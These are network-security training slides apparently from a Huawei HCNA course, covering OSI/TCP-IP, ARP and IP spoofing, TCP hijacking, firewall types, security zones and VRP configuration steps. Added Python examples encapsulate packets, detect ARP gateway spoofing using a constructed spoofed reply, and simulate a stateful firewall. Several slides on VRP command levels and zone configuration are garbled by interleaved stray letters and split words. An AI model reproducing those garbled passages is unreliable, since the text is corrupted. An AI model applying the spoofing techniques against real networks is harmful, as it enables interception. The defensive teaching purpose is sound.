The privilege of HCNA/HCNP/HCIE:

With any Huawei Career Certification, you have the privilege on http://learning.huawei.com/en to enjoy:

1 Comprehensive E-Learning Courses
Content: All Huawei Career Certification E-Learning courses
Method to get the E-learning privilege: submit the Huawei Account and the email being used for Huawei Account registration to Learning@huawei.com.

2 Training Material Download
Content: Huawei product training material and Huawei career certification training material
Method: Log on to http://learning.huawei.com/en and enter HuaWei Training/Classroom Training; then you can download training material in the specific training introduction page.

3 Priority to participate in Huawei Online Open Class (LVC)
Content: The Huawei career certification training covering all ICT technical domains like R&S, UC&C, Security, Storage and so on, which are conducted by Huawei professional instructors
Method: For the plan and participation method, please refer to http://support.huawei.com/ecommunity/bbs/10154479.html

4 Learning Tool: eNSP
eNSP (Enterprise Network Simulation Platform) is a graphical network simulation tool which is developed by Huawei and free of charge. eNSP mainly simulates enterprise routers and switches as close to the real hardware as possible, which makes the lab practice available and easy without any real device.

In addition, Huawei has built up the Huawei Technical Forum, which allows candidates to discuss technical issues with Huawei experts, share exam experiences with others or be acquainted with Huawei Products (http://support.huawei.com/ecommunity/).

HUAWEI TECHNOLOGIES CO., LTD.
Page 1
Chapter 1 Network Security Overview

Copyright 2010 Huawei Technologies Co., Ltd. All rights reserved.
www.huawei.com

Objectives

Upon completion of this course, you will be able to:
Understand the OSI model
Understand TCP/IP principles
Understand TCP/IP security issues
Understand common attack means

Contents

1. OSI Model Introduction
2. TCP/IP Introduction
3. TCP/IP Security Issues
4. Common Network Attacks

OSI Model Generation

Purposes
Design principles
Strengths

Introduction to Seven Layers of the OSI Model

Layer                 No.  Function                                         PDU
Application layer     7    Providing inter-application communication        APDU     (three upper layers)
Presentation layer    6    Processing data formats and data encryption      PPDU     (three upper layers)
Session layer         5    Setting up, maintaining, and managing sessions   SPDU     (three upper layers)
Transport layer       4    Establishing E2E connections of hosts            Segment  (four lower layers)
Network layer         3    Addressing and routing                           Packet   (four lower layers)
Data link layer       2    Providing medium access and link management      Frame    (four lower layers)
Physical layer        1    Transmitting bit streams                         Bit      (four lower layers)

Communication Between Peer Layers

Each layer communicates with its peer layer by using the service provided by the lower layer.

Host A                  PDU        Host B
Application layer       APDU       Application layer
Presentation layer      PPDU       Presentation layer
Session layer           SPDU       Session layer
Transport layer         Segment    Transport layer
Network layer           Packet     Network layer
Data link layer         Frame      Data link layer
Physical layer          Bit        Physical layer

Procedure for Processing Network Data Streams

(Diagram: the two end hosts run all seven layers, Application layer through Physical layer. Router A, Router B and Router C between them process only the Network layer, Data link layer and Physical layer. Points A to E mark the stages along the path.)

Contents

1. OSI Model Introduction
2. TCP/IP Introduction
3. TCP/IP Security Issues
4. Common Network Attacks

Mapping Between TCP/IP and OSI Model Layers

TCP/IP has a simpler layering, and its layers map clearly to the OSI model layers.

OSI                     TCP/IP
Application layer       Application layer
Presentation layer      Application layer
Session layer           Application layer
Transport layer         Transport layer
Network layer           Network layer
Data link layer         Data link layer
Physical layer          Data link layer

Encapsulation and Decapsulation Processes of TCP/IP Packets

Encapsulation process (sending host)          Decapsulation process (receiving host)
Application layer   User data                  User data
Transport layer     TCP | User data            TCP | User data
Network layer       IP | TCP | User data       IP | TCP | User data
Data link layer     Eth | IP | TCP | User data Eth | IP | TCP | User data

Bit stream on the medium: 10101011010101001010100011101010010101

Functions of Each TCP/IP Layer

Layer               Function                                          Protocols
Application layer   Providing a network interface for applications    HTTP, Telnet, FTP, TFTP, DNS
Transport layer     Establishing E2E connections                      TCP/UDP
Network layer       Addressing and routing                            IP, ICMP, IGMP, ARP, RARP
Data link layer     Accessing physical media                          Ethernet, 802.3, PPP, HDLC, FR

Socket

                 TCP                              UDP
Application      FTP    HTTP  Telnet  SMTP   DNS  TFTP  SNMP
Port             20/21  80    23      25     53   69    161
                 IP data packets

Source socket: source IP address + protocol + source port
Destination socket: destination IP address + protocol + destination port

Data Link Layer Protocol

Ethernet protocol encapsulation

Destination address | Source address | Type | Data (46-1500 bytes) | CRC

Types
Type 0800: indicates IP.
Type 0806: indicates ARP.
Type 8035: indicates RARP.

ARP

ARP encapsulation

Ethernet frame header: Destination address | Source address | Frame type (0806 for ARP)

28-byte ARP request/response:
Hardware type | Protocol type | Hardware address length | Protocol address length | OP |
Source Ethernet address | Source IP address | Destination Ethernet address | Destination IP address

Network Layer Protocol

IP packet header:
Version | Packet length | Service type | Total length
Identification | Flag | Fragment offset
TTL | Protocol | Head checksum
Source IP address
Destination IP address
IP option

Transport Layer Protocol

TCP packet format (bit positions 0, 16, 24, 31):
Source port | Destination port
SN
Confirmation No.
Head length | Reserved (6 bits) | URG ACK PSH RST SYN FIN | Window size
TCP checksum | Urgent pointer
Option
Data

UDP packet format:
Source port | Destination port
UDP length | UDP checksum (optional)
Data
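The encapsulation sequence and the Ethernet, IP and TCP header layouts shown on the preceding slides, carried through as an added Python example that is not part of the Huawei material: user data is wrapped in TCP, IP and Ethernet headers (type 0800, IP head checksum, TCP checksum over the pseudo-header), then decapsulated layer by layer with both checksums verified. The MAC addresses, IP addresses, ports and sequence number are sample values borrowed from the deck's diagrams, and all function names are constructed for the example.

```python
import struct

ETHERTYPE_IP = 0x0800   # Type 0800 in the Ethernet header indicates IP
IP_PROTO_TCP = 6
TCP_FLAGS = {"URG": 0x20, "ACK": 0x10, "PSH": 0x08, "RST": 0x04, "SYN": 0x02, "FIN": 0x01}


def checksum16(data):
    """Internet checksum: one's-complement sum of 16-bit words (IP head checksum and TCP checksum)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_tcp(src_port, dst_port, seq, ack, flags, window, payload, src_ip, dst_ip):
    """TCP header as laid out on the slide: ports, SN, confirmation No., head length,
    reserved bits + flags, window size, checksum, urgent pointer; no options."""
    head_len_words = 5  # 20-byte header
    offset_flags = (head_len_words << 12) | sum(TCP_FLAGS[f] for f in flags)
    hdr = struct.pack("!HHIIHHHH", src_port, dst_port, seq, ack, offset_flags, window, 0, 0)
    # the TCP checksum also covers a pseudo-header taken from the IP layer
    pseudo = src_ip + dst_ip + struct.pack("!BBH", 0, IP_PROTO_TCP, len(hdr) + len(payload))
    csum = checksum16(pseudo + hdr + payload)
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:] + payload


def build_ip(src_ip, dst_ip, segment, ident=1, ttl=64):
    """IP header: version/head length, service type, total length, identification,
    flag/fragment offset, TTL, protocol, head checksum, source, destination."""
    total_len = 20 + len(segment)
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, ident, 0x4000, ttl,
                      IP_PROTO_TCP, 0, src_ip, dst_ip)
    csum = checksum16(hdr)
    return hdr[:10] + struct.pack("!H", csum) + hdr[12:] + segment


def encapsulate(user_data, src_mac, dst_mac, src_ip, dst_ip, src_port, dst_port):
    """Application -> Transport -> Network -> Data link, as on the encapsulation slide."""
    segment = build_tcp(src_port, dst_port, 11001, 0, ("SYN",), 8192, user_data, src_ip, dst_ip)
    packet = build_ip(src_ip, dst_ip, segment)
    return dst_mac + src_mac + struct.pack("!H", ETHERTYPE_IP) + packet


def decapsulate(frame):
    """Strip each header in turn; raise ValueError where a layer's check fails."""
    eth_type = struct.unpack("!H", frame[12:14])[0]
    if eth_type != ETHERTYPE_IP:
        raise ValueError(f"not an IP frame: type {eth_type:04x}")
    ip_hdr_len = (frame[14] & 0x0F) * 4
    ip_hdr = frame[14:14 + ip_hdr_len]
    if checksum16(ip_hdr) != 0:        # a header with a correct checksum sums to zero
        raise ValueError("IP head checksum mismatch")
    total_len, proto = struct.unpack("!H", ip_hdr[2:4])[0], ip_hdr[9]
    src_ip, dst_ip = ip_hdr[12:16], ip_hdr[16:20]
    segment = frame[14 + ip_hdr_len:14 + total_len]
    if proto != IP_PROTO_TCP:
        raise ValueError(f"unexpected protocol {proto}")
    pseudo = src_ip + dst_ip + struct.pack("!BBH", 0, proto, len(segment))
    if checksum16(pseudo + segment) != 0:
        raise ValueError("TCP checksum mismatch")
    src_port, dst_port, seq, ack, offset_flags, window = struct.unpack("!HHIIHH", segment[:16])
    tcp_hdr_len = (offset_flags >> 12) * 4
    flags = [name for name, bit in TCP_FLAGS.items() if offset_flags & bit]
    return {
        "src_ip": ".".join(map(str, src_ip)), "dst_ip": ".".join(map(str, dst_ip)),
        "src_port": src_port, "dst_port": dst_port, "seq": seq, "ack": ack,
        "flags": flags, "window": window, "user_data": segment[tcp_hdr_len:],
    }


# Constructed sample: host 10.0.0.1 opening an HTTP connection to server 20.0.0.1.
SAMPLE_FRAME = encapsulate(b"GET / HTTP/1.0\r\n\r\n",
                           bytes.fromhex("000102030405"), bytes.fromhex("001020304050"),
                           bytes([10, 0, 0, 1]), bytes([20, 0, 0, 1]), 40000, 80)

if __name__ == "__main__":
    print(decapsulate(SAMPLE_FRAME))
```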

TCP Connection Establishment

Three-way handshake

(Diagram: the three-way handshake between Client and Server.)

TCP Connection Cutoff

Four-way handshake

(Diagram: the four-way handshake between the side that proactively cuts off the connection and the side that passively cuts off the connection.)

Contents

1. OSI Model Introduction
2. TCP/IP Introduction
3. TCP/IP Security Issues
4. Common Network Attacks

TCP/IP Security Risks

IPv4
Lacking the data source verification mechanism
Lacking the integrity verification mechanism
Lacking the confidentiality guarantee mechanism

Common security risks
Application layer: buffer overflow, vulnerabilities, viruses, and Trojan horses
Transport layer: SYN flood
Network layer: IP address spoofing, packet fragmentation, ICMP attack, and route attack
Data link layer: MAC spoofing, MAC flood, ARP spoofing, STP redirection

ARP Security Risks

Gateway IP address: 192.168.0.1
MAC address: 01-11-21-31-41-51

Host IP address: 192.168.0.10
MAC address: 00-01-02-03-04-05

Host IP address: 192.168.0.11
MAC address: 00-10-20-30-40-50

(Diagram)
ARP spoofing: a host announces "I am the gateway." to the other hosts.
ARP flood: ARP-reply to 192.168.0.1
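The frame layout from the ARP slide (Ethernet header with type 0806 followed by the 28-byte ARP body) and the gateway-impersonation scenario on this slide, as an added Python example that is not part of the Huawei material: it decapsulates constructed ARP replies and raises an alert when a reply claims the gateway IP 192.168.0.1 with a MAC other than the recorded 01-11-21-31-41-51. The sample frames, the known-gateway table and the function names are constructed for the example.

```python
import struct

ETHERTYPE_ARP = 0x0806  # Type 0806 on the Ethernet frame indicates ARP
ARP_OP_REPLY = 2


def mac_str(raw):
    """Render 6 raw bytes in the slide's hyphenated MAC notation."""
    return "-".join(f"{b:02X}" for b in raw)


def mac_bytes(text):
    return bytes(int(part, 16) for part in text.split("-"))


def ip_str(raw):
    return ".".join(str(b) for b in raw)


def ip_bytes(text):
    return bytes(int(part) for part in text.split("."))


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Constructed frame: Ethernet header (destination, source, type) + 28-byte ARP body
    (hardware type, protocol type, hardware address length, protocol address length, OP,
    source MAC/IP, destination MAC/IP), the layout shown on the ARP slide."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETHERTYPE_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_OP_REPLY)
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame):
    """Decapsulate an Ethernet frame; return the ARP fields, or None if it is not Ethernet/IPv4 ARP."""
    if len(frame) < 14 + 28:
        return None
    if struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        return None
    hw_type, proto_type, hw_len, proto_len, op = struct.unpack("!HHBBH", frame[14:22])
    if hw_len != 6 or proto_len != 4:
        return None
    body = frame[22:22 + 2 * (hw_len + proto_len)]
    return {
        "eth_src": mac_str(frame[6:12]),
        "op": op,
        "sender_mac": mac_str(body[0:6]),
        "sender_ip": ip_str(body[6:10]),
        "target_mac": mac_str(body[10:16]),
        "target_ip": ip_str(body[16:20]),
    }


def check_gateway_spoof(frame, known_gateways):
    """Return an alert string if an ARP reply claims a known gateway IP with an
    unexpected MAC (the slide's "I am the gateway" case), otherwise None."""
    arp = parse_arp(frame)
    if arp is None or arp["op"] != ARP_OP_REPLY:
        return None
    expected = known_gateways.get(arp["sender_ip"])
    if expected is None:
        return None
    # both the ARP sender MAC and the frame's source MAC must match the recorded gateway
    if arp["sender_mac"] != expected or arp["eth_src"] != expected:
        return (f"ARP spoofing suspected: {arp['sender_ip']} claimed by {arp['sender_mac']} "
                f"(frame source {arp['eth_src']}), expected {expected}")
    return None


# Constructed samples built from the addresses on the slide: a genuine reply from the
# gateway to host 192.168.0.10, and a reply from host 192.168.0.11 claiming to be the gateway.
KNOWN_GATEWAYS = {"192.168.0.1": "01-11-21-31-41-51"}
LEGIT_REPLY = build_arp_reply("01-11-21-31-41-51", "192.168.0.1",
                              "00-01-02-03-04-05", "192.168.0.10")
SPOOFED_REPLY = build_arp_reply("00-10-20-30-40-50", "192.168.0.1",
                                "00-01-02-03-04-05", "192.168.0.10")

if __name__ == "__main__":
    for frame in (LEGIT_REPLY, SPOOFED_REPLY):
        print(check_gateway_spoof(frame, KNOWN_GATEWAYS) or "ARP reply consistent with gateway table")
```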

IP Security Risks

(Diagram: A: 192.168.0.11, B: 192.168.0.12, and a Sniffer also using 192.168.0.11. The request from A is sniffed, and a spoofed reply is sent.)

Why is the IP address easily spoofed?
Inter-node trust relationship: Build the trust relationship through IP addresses.
Man-in-the-middle attack: Forge legitimate IP addresses to obtain confidential information.

TCP Security Risks

(Diagram: A trusts B. Host C initiates an attack.)
Deny service from C to B
Spoofed packet from C to A: SYN, SEQ 11001
Host A: SYN ACK, SEQ 54002, ACK 11001
Spoofed packet from B to A: ACK 54003
Result: unauthorized connection

Contents

1. OSI Model Introduction
2. TCP/IP Introduction
3. TCP/IP Security Issues
4. Common Network Attacks

Passive Attack

(Diagram: Host A and Host B communicate across the Internet; the traffic is monitored.)
Monitoring
Detection
Defense

Why is the IP address easily spoofed?

Active Attack

(Diagram: Host A reaches the business resources of an enterprise across the Internet.)

Spoofing attack: Spoofed part | Data load
Falsification attack: Packet head | Falsified part
DoS attack

Man-in-the-Middle Attack

(Diagram: Host A and Host B communicate across the Internet; the Attacker sits between them.)
Proactive attack: Falsify information
Passive attack: Steal information

Summary

OSI model
TCP/IP principles
TCP/IP security issues
Common attack means

Question

Why is ARP spoofing easily initiated?
How is IP spoofing realized?
What is the difference between TCP and UDP?
Why does TCP have a head length field, but UDP does not?
Why does TCP connection establishment require a three-way handshake, but disconnection requires a four-way handshake?

Answer

Thank you
www.huawei.com

Chapter 2 Basic Firewall Technology

www.huawei.com

Objectives

Upon completion of this course, you will understand:
Definition and classification of firewalls
Main features and technologies of firewalls
Data forwarding process and basic firewall configurations

Contents

1. Firewall Overview
2. Firewall Working Modes
3. Firewall Security Zones
4. Firewall Functions
5. Basic Firewall Configuration

Firewall Overview

Firewall functions:
Filter for logical areas
Hides intranet structure
Self-security guarantee
Active attack defense

(Diagram: Intranet, Router, Firewall.)
Is it possible to protect against the flow that does not go through the firewall?

Firewall Classification

By form
Hardware firewall
Software firewall

By protected target
Standalone firewall
Network firewall

By access control method
Packet filtering firewall
Proxy firewall
Stateful inspection firewall

Firewall Classification: Packet Filtering Firewall

(Diagram: the packet IP | TCP | APP passes through the firewall's Data link layer and IP layer below the TCP layer; the firewall detects headers only.)

1. Cannot correlate data packets
2. Cannot adapt to multi-channel protocols
3. Do not check application-layer data

Firewall Classification: Proxy Firewall

(Diagram: Extranet terminal, Proxy firewall, Intranet server.)
Send connection requests.
Security check on the requests to block unqualified ones.
Establish connection with the client if the request goes through the security check.
Establish connection with the server if going through the check.
Send packet A to the firewall.
Send packet A to the server.
Send response packet B to the firewall.
Send response packet B to the terminal.

1. Slow processing
2. Difficult to upgrade

Firewall Classification: Stateful Inspection Firewall

(Diagram: Host 10.0.0.1 and Server 20.0.0.1 communicate through the firewall.)
TCP SYN 10.0.0.1 -> 20.0.0.1: security policy check; record session information.
TCP SYN ACK 20.0.0.1 -> 10.0.0.1, TCP ACK 10.0.0.1 -> 20.0.0.1 and the following packets: matched against the recorded session.
A packet that does not fit the recorded session state: state error, drop.

1. Rapid processing
2. High security
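The stateful inspection behaviour sketched above (security policy check on the opening SYN, session recorded, following packets matched against it, out-of-state packets dropped), as an added Python example that is not part of the Huawei material. It replays the slide's exchange between Host 10.0.0.1 and Server 20.0.0.1 and then two segments from the server side that belong to no session; the policy rule format, the quintuple session key and all class and function names are constructed for the example (retransmitted SYNs are not modelled).

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src_ip: str
    dst_ip: str
    proto: str
    src_port: int
    dst_port: int
    flags: frozenset  # e.g. {"SYN"}, {"SYN", "ACK"}, {"ACK"}

    def quintuple(self):
        return (self.src_ip, self.src_port, self.dst_ip, self.dst_port, self.proto)

    def reverse_quintuple(self):
        return (self.dst_ip, self.dst_port, self.src_ip, self.src_port, self.proto)


@dataclass
class Session:
    state: str = "SYN_SENT"
    packets: int = 0


class StatefulFirewall:
    """Policy is checked once, on the connection-opening SYN; everything afterwards is
    matched against the recorded session (the slide's "record session information")."""

    def __init__(self, policy):
        self.policy = policy   # constructed rule format: (src_ip_prefix, dst_ip, dst_port) permits
        self.sessions = {}     # quintuple as seen from the initiator -> Session
        self.log = []

    def _policy_permits(self, pkt):
        return any(pkt.src_ip.startswith(src) and pkt.dst_ip == dst and pkt.dst_port == port
                   for src, dst, port in self.policy)

    def process(self, pkt):
        """Return 'forward' or 'drop' and record the reason, as the slide's flow does."""
        fwd = self.sessions.get(pkt.quintuple())          # initiator -> responder direction
        rev = self.sessions.get(pkt.reverse_quintuple())  # responder -> initiator direction
        sess = fwd or rev
        if sess is None:
            if pkt.flags != {"SYN"}:
                return self._decide(pkt, None, "drop", "state error, drop")
            if not self._policy_permits(pkt):
                return self._decide(pkt, None, "drop", "security policy check failed")
            sess = self.sessions[pkt.quintuple()] = Session()
            return self._decide(pkt, sess, "forward", "record session information")
        if rev is not None and sess.state == "SYN_SENT" and pkt.flags == {"SYN", "ACK"}:
            sess.state = "SYN_RCVD"
            return self._decide(pkt, sess, "forward", "reply matches session")
        if fwd is not None and sess.state == "SYN_RCVD" and "ACK" in pkt.flags:
            sess.state = "ESTABLISHED"
            return self._decide(pkt, sess, "forward", "handshake complete")
        if sess.state == "ESTABLISHED" and "SYN" not in pkt.flags:
            return self._decide(pkt, sess, "forward", "following packet of session")
        return self._decide(pkt, sess, "drop", "state error, drop")

    def _decide(self, pkt, sess, verdict, reason):
        if sess is not None and verdict == "forward":
            sess.packets += 1
        self.log.append((pkt.quintuple(), set(pkt.flags), verdict, reason))
        return verdict


def replay_slide_exchange():
    """Constructed replay: Host 10.0.0.1 opens TCP/80 to Server 20.0.0.1 and sends data,
    then the server side sends a SYN and an ACK that belong to no recorded session."""
    fw = StatefulFirewall(policy=[("10.0.0.", "20.0.0.1", 80)])
    verdicts = [
        fw.process(Packet("10.0.0.1", "20.0.0.1", "TCP", 51000, 80, frozenset({"SYN"}))),
        fw.process(Packet("20.0.0.1", "10.0.0.1", "TCP", 80, 51000, frozenset({"SYN", "ACK"}))),
        fw.process(Packet("10.0.0.1", "20.0.0.1", "TCP", 51000, 80, frozenset({"ACK"}))),
        fw.process(Packet("10.0.0.1", "20.0.0.1", "TCP", 51000, 80, frozenset({"ACK", "PSH"}))),
        # unsolicited SYN from the server side: no session, and no permit rule for that direction
        fw.process(Packet("20.0.0.1", "10.0.0.1", "TCP", 4444, 51001, frozenset({"SYN"}))),
        # ACK with no prior SYN: a stateless filter permitting "established" traffic would pass it
        fw.process(Packet("20.0.0.1", "10.0.0.1", "TCP", 80, 51002, frozenset({"ACK"}))),
    ]
    return fw, verdicts


if __name__ == "__main__":
    fw, verdicts = replay_slide_exchange()
    for (key, flags, verdict, reason) in fw.log:
        print(verdict.upper().ljust(8), reason.ljust(30), key, sorted(flags))
```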

Firewall Hardware Platform Classification

Intel X86: Suitable for 100 M networks; limited by CPU processing ability and PCI bus speed.
ASIC: Hardware circuit, which solidifies the instruction or calculation logic into the hardware for high processing capacity and firewall performance.
NP: Specifically designed for data packets; a compromise between the X86 and ASIC.
Multi-core: New-generation hardware platform. Multi-core solutions, higher integration, more efficient intercore communication and management mechanism.

Contents

1. Firewall Overview
2. Firewall Working Modes
3. Firewall Security Zones
4. Firewall Functions
5. Basic Firewall Configuration

Firewall Working Modes

Routing mode: each interface has an IP address.
Transparent mode: no interface has any IP address.
Composite mode: some interfaces have an IP address.

Do the interfaces in transparent mode have no IP address?

(Diagram: firewall working mode, routing mode.)

Routing Mode

Features of routing mode
Supports more security features
Has some influence on network topology

(Diagram: Internet; Untrust side 192.168.10.1/30 and 192.168.10.5/30; Trust side 192.168.10.129/30 and 192.168.10.133/30.)

Transparent Mode

Features of transparent mode
Having no influence on network topology

(Diagram: Internet; Untrust 192.168.10.1/30; Trust 192.168.10.2/30. The firewall interfaces carry no IP addresses.)

Composite Mode

Features of composite mode
Transparent to network topology

Does a single firewall support composite mode?

(Diagram: Internet; Untrust 192.168.10.1/30 and 192.168.10.2/30; 1.1.1.1/30 and 1.1.1.2/30; Trust 192.168.10.129/30 and 192.168.10.130/30.)

Contents

1. Firewall Overview
2. Firewall Working Modes
3. Firewall Security Zones
4. Firewall Functions
5. Basic Firewall Configuration

Definition of Security Zones

Default security zones
Untrust zone
Demilitarized zone (DMZ)
Trust zone
Local zone

Where is the local zone?

(Diagram: ISP A and ISP B connect to the Untrust zone; the DMZ holds the Web server and Mail server; the Trust zone is the Enterprise Intranet with the Financial server, ERP data server, OA server and User terminals.)

Definition of Inbound and Outbound

What is inbound?
What is outbound?

(Diagram: Untrust zone, Internet, low security level; Trust zone, Enterprise Intranet, high security level.)

Relationship Between Firewall Security Zones and Interfaces

Can the firewall have two security zones with the same security level?
Does the firewall allow one physical interface to belong to two different security zones?
Can different interfaces of the firewall belong to the same security zone?

(Diagram: G0/0/3 Untrust zone (Internet); G0/0/2 DMZ; G0/0/0 Trust zone; G0/0/1 Trust zone.)

Contents

1. Firewall Overview
2. Firewall Working Modes
3. Firewall Security Zones
4. Firewall Functions
5. Basic Firewall Configuration

Firewall Functions

Switch: FE, GE; VLAN; Trunk, 802.1ad
Routing: Static routing; Policy routing; RIPv2; OSPFv2; BGPv4
Security: ACL; NAT; VPN: L2TP/GRE/IPSec/SSL/MPLS; P2P/IM
UTM: AV; IPS; Anti-spam; URL filtering
Unified management: SNMPv2v3; RMON; TR069; Telnet/SSL/HTTP(s); FTP/TFTP; SYSLOG
WLAN/WWAN: WiFi 802.11 b/g; PPP; PPPoE; ADSL2+; HDLC; 3G

Main Firewall Function: Access Control

Identify header, offer implementation measures
Packet: MAC | IP | TCP | Data load
Policy: Subject attributes; Subject operations
Identity: Identity check

(Diagram: Host A accesses the Server through the firewall, which performs identity check and access control.)

Basic Firewall Function: Deep Packet Inspection

Identification based on:
Feature fields
Application-layer gateways
Behavior patterns

SACG Interworking Technology

(Diagram: Branches with client agents and VPN access connect through the SACG (firewall), which separates the pre-authentication domain from the post-authentication domain. Servers shown: SM, SC, SRS, SPS, Anti-virus server, Domain management server, Patch server. Roles: Security auditor, Security administrator.)

Agent: client agent
SACG: security access control gateway (firewall)
SM: management server
SC: control server
UCL: account ACL

High Availability 1: Dual-System Hot Backup

(Diagram: USG (host) and USG (standby) sit between the Trust zone, Intranet 10.110.1.0/24 with PCs and a Server, and the Untrust zone, Extranet 202.10.0.0/24 with PCs and a Server.)

VRRP: provides redundant backup
VGMP: unifies the host and standby state of all interfaces on the device
HRP: the information synchronized between the firewalls, for example, session information and configuration information

High Availability 2: IP Link

(Diagram: the firewall has links to Carrier A and Carrier B; the link to Carrier A is marked as failed.)

The results of IP link automatic inspection can be referenced by other functions, and the main applications include:
Applications in static routing
Applications in dual-system hot backup

QoS

E2E Flow Control
Receiving packets -> Classification and marking -> Congestion monitoring -> Congestion management -> Bandwidth guarantee

Provides service quality assurance
Improves customer satisfaction
Maximize resource utilization and improve service quality

Log Auditing

(Diagram: Extranet, firewall, Intranet, Log server, Enterprise Intranet users.)

Collects all logs passing through the device
Realizes high-speed log flow through the binary log format

With eLog software, the firewall provides users with a clear record of network access, and analysis for reference.

Firewall Features 1

(Diagram: security zones Untrust, Local, Trust and DMZ around the firewall, with the Intranet behind it.)

Session List and ASPF: Session list: quintuple. Server map list: triple.
Long Connection: The corresponding data flow should not be aged for a long time.
Blacklist: User IP addresses matching the blacklist will be shielded.
Packet Statistics: Through packet statistics analysis, the firewall realizes protection.
Attack Defense: Attack defense can detect various types of network attacks.
Fragment Caching: Apply fragment caching to a fragment that reaches the firewall earlier than the first fragment of the packet.
MAC and IP Address Binding: Avoid IP address fraud attacks.
Packet Filtering: IP packet filtering.
Port Identification: Allow users to define a group of new port numbers in addition to the well-known port numbers.

Firewall Features 2

Access Control List: Application basis of packet filtering, NAT, IPSec, QoS, and policy-based routing.
Network Address Translation: Slows down IP address space exhaustion; hides Intranet private IP addresses.
Authentication and Authorization: RADIUS protocol; HWTACACS.
Layer-2 Tunneling Protocol: Adopts packet exchange network technology for information exchange, which extends the PPP model.
GRE VPN: Layer-3 tunneling protocol using tunnel technology.
Load Balancing: Uses the processing capacity of all servers for load balancing.
IP-CAR: IP connection limit; IP bandwidth limit.
P2P Traffic Limiting: Limits P2P traffic to ensure normal operation of other services.
Logging: Attack defense log; Traffic monitoring log; Blacklist log; Information statistics.
IPSec VPN: Privacy; Integrity; Authenticity; Replay attack defense.

Firewall Performance Indicator: Throughput

Throughput: the maximum traffic load that the firewall can process per unit time.
Effective throughput: the actual transmission rate per second, excluding the data due to TCP packet drop and retransmission.

Firewall Performance Indicator: Latency

Definition: The time interval from the last bit of a data packet going into the firewall to the first bit going out of the firewall. The indicator is used to measure the speed of firewall processing data.

(Diagram: a Smartbits 6000B test set measures the time interval between the last bit of the data packet going in and the first bit going out; the latency of packet arrival. Packets can be forwarded only after being detected in the queue.)

Firewall Performance Indicator: New Connections per Second

Definition: the number of new complete TCP connections established through the firewall per second.
This indicator is used to measure the real-time data flow processing capacity of the firewall.

Firewall Performance Indicator: Concurrent Connections

Definition: A firewall processes packets based on connections, and the number of concurrent connections refers to the maximum number of connections that can be accommodated at the same time. One connection is a TCP/UDP access attempt.
This indicator is used to measure the maximum number of connections that can be established between the host and the server at the same time.

Contents

1. Firewall Overview
2. Firewall Working Modes
3. Firewall Security Zones
4. Firewall Functions
5. Basic Firewall Configuration

VRP Platform

Implements a unified user interface and management interface, including the real-time operating system kernel, IP software forwarding engine, route processing, and configuration management platform.
Implements the platform control function, defines plane interface forwarding specifications, and realizes the interaction between the forwarding plane and the VRP control plane of each product.
Implements the network interface layer and shields the differences between the link layer and network layer of each product.

VRP Command Line Classificationi.c
e
w
It includes network diagnostic tool commands (ping and a
tracert),
u
h (Telnet client,
commands accessing external devices from the local device
.
Visit Level
g
SSH, and Rlogin). By using these commands, the configuration
files are not
n
i
allowed to be saved.
n
r
a
e
It is used for system maintenance andlservice failure diagnosis. It includes
/ using these commands, the
Monitoring
/
display and debugging commands.
By
:
Level
p
configuration files are not allowed
t to be saved.
t
h
:
It includes service configuration
commands. For example, commands of
s
e
Configuration
cnetwork layer, which provide direct network services
routing and each
r
Level
for users. ou
s
e
R
Itgis related to the system basic operation. It includes commands used by
n
Management
i
the system to support the module. These commands provide a support
n
Level
r
a for services.
e
L
eht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.
r
Pa ge 47
Copyrig
o

VRP Command View

The system divides the command line interface into multiple command views. All commands of the system are registered under certain command views, and a command can be run only in the view it is registered under.

Command view classification:

User view: <USG>
System view: [USG]
Interface view: [USG-Ethernet0/0/1]
Protocol view: [USG-rip]

VRP Online Help

Type a command, followed by "?" separated by a space. If a keyword is expected at this position, all keywords and their brief descriptions are displayed.

<USG 5000> display ?

Type a command, followed by "?" separated by a space. If a parameter is expected at this position, the description of the parameter is displayed.

[USG 5000] interface ethernet ?
<3-3> Slot number

Type a character string followed by "?"; all commands beginning with this character string are displayed.

<USG 5000> d?
debugging delete dir display

VRP Online Help

Type the first few characters of a keyword of the command and then press Tab; the complete keyword is displayed.

When the pause menu is displayed, press Ctrl+C to stop the display and the command execution.

When the pause menu is displayed, press Space to display the next screen of information.

When the pause menu is displayed, press Enter to display the next line of information.

Basic Configuration Thinking of Firewall

(Figure: configuration flow, based on network requirements.)

Interface mode: Layer-3 interface (configure the interface IP address) or Layer-2 interface.

Adding the interface into the security zone.

Interzone packet filtering relationship configuration.

Packet forwarding: if NAT is required, interzone NAT configuration; if NAT is not required, routing configuration.
Interface Mode Configuration

Step 1 Run the system-view command to enter the system view.

Step 2 Run the interface interface-type interface-number command.

Step 3.1 Run the ip address ip-address { mask | mask-length } command to configure a Layer-3 Ethernet interface.

Step 3.2 Run the portswitch command to configure a Layer-2 Ethernet interface.
Security Zone Configuration

Step 1 Run the system-view command to enter the system view.

Step 2 Run the firewall zone [ vpn-instance vpn-instance-name ] [ name ] zone-name command to create the security zone and enter the corresponding security zone view.

The security zone exists: the name keyword is not required; enter the security zone view directly.

The security zone does not exist: configure the name keyword; the security zone is created and its view is entered.

Step 3 Run the set priority security-priority command to configure the security level of the security zone.
n
e
/

Adding Interface into the Securityom


c
.
i
Zone
e
w

Step 1

Run the system-view command to enter theuasystem view.

h
.
g

Step 2 Run the firewall zone [ vpn-instance vpn-instance-name


]
n
i
[ name ] zone-name command to create thernsecurity zone and
a
e
enter the corresponding security zone/view.
l

/
:
Step 3
Run the add interface interface-type
interface-number
p
t
command to configure the interface
ht to be added into the security
:
s
zone.
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
eht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.
r
Pa ge 54
Copyrig
o

n
e
/
